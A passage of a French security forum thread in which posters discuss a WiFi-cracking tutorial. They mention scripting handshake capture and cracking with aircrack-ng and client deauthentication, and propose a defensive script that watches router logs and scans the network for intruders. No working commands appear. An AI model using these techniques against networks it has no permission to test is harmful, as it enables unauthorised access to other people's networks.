Citation :* serait-il possible d'automatiser ça ? faire par exemple un programme qui tourne en tache de fond et surveille les accès indus, ça pourrait faire l'objet d'un projet sécu ? ça existe peut-être déjà ? => Tu peux tout à fait scripter tout ça, de telle sorte à ce que ça trouve un bon AP, le sniff, trouve son handshake et parte faire un crack.

yep, là encore merci de me confirmer que c'est possible, c'est précisément ce sur quoi je voulais attirer l'attention
je me dis qu'un article autour d'un ptit code perso qui par exemple lirait en temps réel le log de connexion du routeur comme tu disais, ou tenterait de découvrir des machines sur le réseau à l'aide de {nmap,hping,tshark,scapy,zob,...} et le cas échéant remonterait une alerte sous forme d'un popup (...) serait finalement tout aussi intéressant qu'un tuto sur comment utiliser aircrack-ng pour pirater son voisinage

Ça peut se tout à fait faire. Me faudra juste du temps, car je n'ai pas encore scripté quoi que ce soit.

(17-11-2013, 20h44)c4ffein a écrit : La il crack sans injection de packet a ce que j'ai compris, non?
Je n'injecte aucun paquet, en effet. Par contre, j'aurais pu faire un passage sur la dé-authentification d'un client (qui se fait via l'envoi de paquet DeAuth).
+1 (0) -1 (0) Répondre


Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  [HowTo]Bypass d'un mot de passe Windows Swissky 26 1,500 10-05-2020, 08h42
Dernier message: leni2206

Atteindre :


Utilisateur(s) parcourant ce sujet : 6 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut